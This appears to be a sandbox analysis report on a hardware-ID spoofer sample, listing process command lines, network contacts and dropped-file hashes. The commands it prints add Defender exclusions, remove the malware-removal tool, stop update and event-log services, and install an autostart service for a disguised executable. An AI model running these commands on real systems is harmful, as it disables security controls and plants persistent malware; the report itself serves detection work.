"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813766HP-TRGT11225SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513766HP-TRGT11225SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413766HP-TRGT11225FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613766HP-TRGT11225FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313766HP-TRGT11225DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713766HP-TRGT11225MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\en-US\conhost.exe

"C:\Windows\en-US\conhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13786HP-TRGT10179AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213786HP-TRGT10179RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813786HP-TRGT10179SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513786HP-TRGT10179SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413786HP-TRGT10179FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613786HP-TRGT10179FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313786HP-TRGT10179DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713786HP-TRGT10179MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9STD-728M

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9STD-728M

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: L3HH-BOM7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: L3HH-BOM7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: LCAU-R7JM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: LCAU-R7JM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: MIMF-CKII

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: MIMF-CKII

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: IDOC-5UBC

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: IDOC-5UBC

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: OK55-44IB

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: OK55-44IB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 1V8C-OFFM

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 1V8C-OFFM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ES01-2ISC

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ES01-2ISC

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: DG7N-0PH6

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: DG7N-0PH6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 4OPL-NR0L

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 4OPL-NR0L

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: AIU0-JR6C

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: AIU0-JR6C

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: K4SE-OBJ5

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: K4SE-OBJ5

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: ITOB-656E

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: ITOB-656E

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ELPA-BVHJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ELPA-BVHJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TUUN-ZIF6

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TUUN-ZIF6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 3IFZ-F8R8

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 3IFZ-F8R8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: I3BO-LVNZ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: I3BO-LVNZ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 6IR5-E850

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 6IR5-E850

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7JH1-CGH2

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7JH1-CGH2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6PP0-BHZ7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6PP0-BHZ7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KUMP-L181

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KUMP-L181

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: BUED-JILZ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: BUED-JILZ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: NRC2-CPJG

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: NRC2-CPJG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

Network

Country Destination Domain Proto
US 8.8.8.8:53 bookreading2024.net udp
US 104.21.61.25:443 bookreading2024.net tcp
US 8.8.8.8:53 25.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
IT 185.196.11.122:80 185.196.11.122 tcp
RU 147.45.44.3:80 147.45.44.3 tcp
RU 147.45.44.3:80 147.45.44.3 tcp
US 8.8.8.8:53 122.11.196.185.in-addr.arpa udp
US 8.8.8.8:53 3.44.45.147.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
RU 147.45.44.3:80 147.45.44.3 tcp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

memory/1572-0-0x00000000000F0000-0x000000000011C000-memory.dmp

memory/1572-1-0x00007FFFBA0D3000-0x00007FFFBA0D5000-memory.dmp

memory/1572-2-0x00000000008C0000-0x00000000008C6000-memory.dmp

memory/1572-3-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

memory/1572-5-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgayrlwq.fgu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4708-6-0x0000022FA3E90000-0x0000022FA3EB2000-memory.dmp

memory/4708-16-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

memory/4708-17-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

memory/4708-18-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

MD5 280f228a0fd9232c72c66646f5ac8f27
SHA1 f6ed9a02fe24afa92b832efb95d4c140f1f9855a
SHA256 6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51
SHA512 5e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e

C:\Users\Admin\AppData\Roaming\conhostsft.exe

MD5 975eca3793d5ec51d4bd4041fe4bd595
SHA1 f3b36aad3566d36a81cb8ab11c49e28b8fbb807e
SHA256 50a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3
SHA512 af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89

memory/4708-44-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 81a45f1a91448313b76d2e6d5308aa7a
SHA1 0d615343d5de03da03bce52e11b233093b404083
SHA256 fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe

MD5 bb93bfa99237b0efc8e476af92d2882c
SHA1 aa3285a0166dc7efe30a9156ea0d98af9f83651a
SHA256 92820ca93b03d8c98ffeee165a92b6fa536abd34c97bb692b51e70f6f74dbeb0
SHA512 40d8867fe2335315bd8de9da2571a0ba22e7760e5a6a9743a3aa611113406c0e4fc7f5b25986a18e58feb3e7e510923dc6320ae44fdce9ea02a467b3cab6ac70

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 33d7a84f8ef67fd005f37142232ae97e
SHA1 1f560717d8038221c9b161716affb7cd6b14056e
SHA256 a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512 c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

C:\ProgramData\Microsoft\Windows\DevManView.cfg

MD5 43b37d0f48bad1537a4de59ffda50ffe
SHA1 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256 fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512 cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat

MD5 62a4289ada4d67fedd4d54ba96b5b228
SHA1 c60573ddfd05111be1adf47d28cd04ecadd5eaef
SHA256 6c4f31567a23e66fb38e0d495d8a0c2d4284d03ce58d3a45e7964a3f68035d50
SHA512 d609dd9179a243fe2f89559276bd424490045e80d112f63c63b20271f1f63c0ad2d89bf256e2c0dfba29c37e2ba34bb7067e02388aa1490e22fc13660473d64a

C:\ChainReview\sphyperRuntimedhcpSvc.exe

MD5 93457a02f578affc1800d7528c5370f3
SHA1 fc79e5088c9df79bcd8e53d0b95661c3b5396806
SHA256 ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5
SHA512 4c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e

memory/3556-100-0x0000000000AE0000-0x0000000000CE4000-memory.dmp

memory/3556-105-0x00000000013C0000-0x00000000013CE000-memory.dmp

memory/3556-107-0x000000001B910000-0x000000001B92C000-memory.dmp

memory/3556-108-0x000000001BBD0000-0x000000001BC20000-memory.dmp

memory/3556-110-0x000000001B930000-0x000000001B948000-memory.dmp

memory/3556-112-0x000000001B8F0000-0x000000001B8FE000-memory.dmp

memory/3556-114-0x000000001B900000-0x000000001B90E000-memory.dmp

memory/3556-116-0x000000001B950000-0x000000001B95C000-memory.dmp

memory/3556-118-0x000000001B960000-0x000000001B96E000-memory.dmp

memory/3556-120-0x000000001BB80000-0x000000001BB8C000-memory.dmp

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\amifldrv64.sys

MD5 785045f8b25cd2e937ddc6b09debe01a
SHA1 029c678674f482ababe8bbfdb93152392457109d
SHA256 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA512 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7dd8e4f2517f6deec77fba323ac37f81
SHA1 e264fb735ddbf68945de4aa62f378fb262fea889
SHA256 9ba62fdde3544a604a0ea671bcd5cf62ced3439a1d02d5069ae8b6b5c8652ea6
SHA512 b638efaf087717eca0da414824741291a2043e254ade639182c21d35f23e3c24abffb79b43f42fb0fbe5a78aa5b357a4e6f64e4e7e8ef511143a2565bb86185e

C:\Users\Admin\AppData\Local\Temp\KnrOHCCDDZ.bat

MD5 2a9979c4257d7e16e538c8580c70646f
SHA1 8b401fb93cb8c8071ecbf2d19c9cb37abe8487fc
SHA256 7d5e9bf45fe1cd70114a1efe3beab62a0555e23c23cb17e30edd0b59cc9491f2
SHA512 cce51043daa2c44b129a60b85f9a5490c04239e7367e8bddebd67fe8824cf4ac729a18e9103b762bce050b711d3aa88614654282b0b619cd797c6be81b7ffd17

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0fd3f36f28a947bdd05f1e05acf24489
SHA1 cf12e091a80740df2201c5b47049dd231c530ad3
SHA256 d36c21211f297a74a801881707690fa7a0a0a31addd3c7ba1522275b8848ab50
SHA512 5f132308b06e621aace1091f523649bcb5d1823b478691799791f4154cb96b9897f563eed8ad8db4a03714d815246479372e0920c659eb3fd9006271e58429ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa6672b47c4b32de047db3b0204c8cb6
SHA1 fbc33cb99b0dcdde36ba0c1a02af808970b671d9
SHA256 f5aa3390c32750a43f2ab55f035c5eff175e3c27f85b35adb524262443a672b6
SHA512 b2057a17cdfe8401f57cf255e360d71b0e6b6699c6308486e8ae5e33459fecba32a3d6758c2fa756a0064346c90b3ac5a0016f1a1220a2d5faaec0cbce1eb83d

memory/3780-257-0x000002B32F050000-0x000002B32F06C000-memory.dmp

memory/3780-258-0x000002B32F070000-0x000002B32F125000-memory.dmp

memory/3780-259-0x000002B32F130000-0x000002B32F13A000-memory.dmp

memory/3780-260-0x000002B32F2A0000-0x000002B32F2BC000-memory.dmp

memory/3780-261-0x000002B32F280000-0x000002B32F28A000-memory.dmp

memory/3780-262-0x000002B32F2E0000-0x000002B32F2FA000-memory.dmp

memory/3780-263-0x000002B32F290000-0x000002B32F298000-memory.dmp

memory/3780-264-0x000002B32F2C0000-0x000002B32F2C6000-memory.dmp

memory/3780-265-0x000002B32F2D0000-0x000002B32F2DA000-memory.dmp

memory/2368-272-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-271-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-274-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-269-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-268-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-270-0x0000000140000000-0x000000014000E000-memory.dmp